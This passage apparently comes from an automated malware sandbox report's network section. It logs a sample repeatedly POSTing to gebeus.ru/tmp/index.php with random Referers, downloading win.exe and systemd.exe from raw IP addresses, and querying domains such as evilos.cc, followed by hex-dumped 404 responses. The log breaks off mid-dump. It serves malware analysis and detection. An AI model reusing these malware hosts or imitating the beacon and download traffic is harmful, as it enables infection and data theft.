      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qdkcshccmtjsaxfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: gebeus.ru
      Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpvhivgiojy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkeywmaxpqyajg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyaejpplhrtmlm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ochmmwawdfhift.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmrqxjpnnmfq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfkimedsiioubu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsqdyhadbujwtt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gaccdlqnuttqyggb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwyiclkccgwel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayjiiqvsdwkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sisxkrjxvfhbylwf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejjtkyjcscj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkihnepnpjlak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yakfbjcglwus.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahnkvlymtyox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scclxbagqps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftpgvbtjlgwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thvbfefxpihwuvsy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: gebeus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
      Source: global trafficDNS traffic detected: DNS query: evilos.cc
      Source: global trafficDNS traffic detected: DNS query: gebeus.ru
      Source: global trafficDNS traffic detected: DNS query: mussangroup.com
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8931
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ea Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 